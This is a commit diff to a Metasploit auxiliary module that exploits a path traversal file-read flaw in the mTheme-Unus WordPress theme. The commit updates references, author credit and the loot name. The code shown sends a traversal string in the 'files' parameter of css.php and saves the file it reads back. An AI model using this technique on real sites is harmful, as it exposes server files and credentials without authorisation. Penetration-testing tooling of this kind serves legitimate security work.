Add author, EDB, WPVDB and fix loot.

espreto · espreto · commit 0031f09d6051 · 2015-04-15T20:03:36.000-03:00
diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
@@ -21,11 +21,12 @@ def initialize(info = {})
       },
       'References'     =>
         [
-          ['EDB', '77777']
+          ['EDB', '36733'],
+          ['WPVDB', '7898']
         ],
       'Author'         =>
         [
-          'TO DO', # Vulnerability discovery
+          'Khwanchai Kaewyos', # Vulnerability discovery
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
         ],
       'License'        => MSF_LICENSE
@@ -47,8 +48,7 @@ def run_host(ip)
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'wp-content', 'themes', 'mTheme-Unus',
-                                'css', 'css.php'),
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'wp-content', 'themes', 'mTheme-Unus', 'css', 'css.php'),
       'vars_get' =>
         {
           'files' => "#{traversal}#{filename}"
@@ -65,7 +65,7 @@ def run_host(ip)
       fname = datastore['FILEPATH']
 
       path = store_loot(
-        'rips.traversal',
+        'mobileedition.traversal',
         'text/plain',
         ip,
         res.body,
